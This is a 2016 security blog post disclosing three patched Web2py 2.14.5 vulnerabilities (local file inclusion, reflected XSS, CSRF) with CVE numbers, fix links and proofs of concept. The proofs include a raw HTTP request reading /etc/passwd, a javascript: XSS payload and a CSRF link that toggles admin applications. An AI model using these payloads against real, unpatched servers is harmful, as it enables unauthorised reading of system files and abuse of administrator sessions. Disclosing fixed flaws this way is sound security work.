Sunday, 15 May 2016

Web2py Vulnerabilities 2.14.5 : LFI,XSS,CSRF

Web2py Vulnerabilities


This post is about Web2py  Vulnerabilities which we have found, POC`s are created under Mac OS X EI Capitan, But also tested on windows 7 as well as linux platform.

# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF
# Reported Date : 2-April-2016
# Fixed Date : 4-April-2016
# Exploit Author : Narendra Bhati
# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808
# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
# Fix/Patching : Update To Web2py. 2.14.6
# Facebook : https://facebook.com/iambhati
# Twitter : http://twitter.com/NarendraBhatiB

Additional Links/Information

LFI :https://github.com/web2py/web2py/pull/1317/files

  • POST URI - /admin/default/pack_custom/[applicationmame]

  • Vulnerable Parameter = file

  • Exploit - file=/etc/passwd

  • Authentication Required = Yes(Administrator)

Reflected XSS https://github.com/web2py/web2py/commit/51c3b633fe7ad647bc3013e899c1e3a910362dd1

  • GET URI  - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl

  • Vulnerable Parameter - source

  • Exploit - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=javascript:alert(1)

  • Authentication Required - Yes(Administrator)

CSRF : https://github.com/web2py/web2py/commit/4bd002aee978813bc664cf186ef38ff4e8bbe1cd

  • GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]

  • Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]

  • Authenticated Required - Yes(Administrator)

=======================================================

# Detailed POC - 

Web2py 2.14.5 LFI Vulnerability : CVE-2016-4806

Technical Details

Parameter "file" was vulnerable for LFI.
POST /admin/default/pack_custom/dasdasdasdad HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad
Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3213

file=/etc/passwd





After sending this request, Application will prompt a file to download as an extension of "w2p".





Now we have to unpack this downloaded file using. https://github.com/pigeonflight/web2py-unpacker



After unpacking this file, You will able to read the "passwd" file.



POC Video


======================================================

Web2py 2.14.5 Reflected XSS Vulnerability : CVE-2016-4807

Once victim execute this link - http://127.0.0.1:8000/admin/default/install_plugin/applicationname?plugin=math2py&source=javascript:alert(1)

the value of parameter "source" will get reflected in "href" tag, When victim click on "here" button the Javascript will get execute.







POC Video


======================================================



Web2py 2.14.5 CSRF Vulnerability : CVE-2016-4808

Due this vulnerability, An attacker can trick an admin to enable or disable installed applications.

Installed application will get enable if it is already disable and vice versa , If authenticate admin execute this link - http://127.0.0.1:8000/admin/default/enable/[applicationname]
POC Video





Comments are always welcome.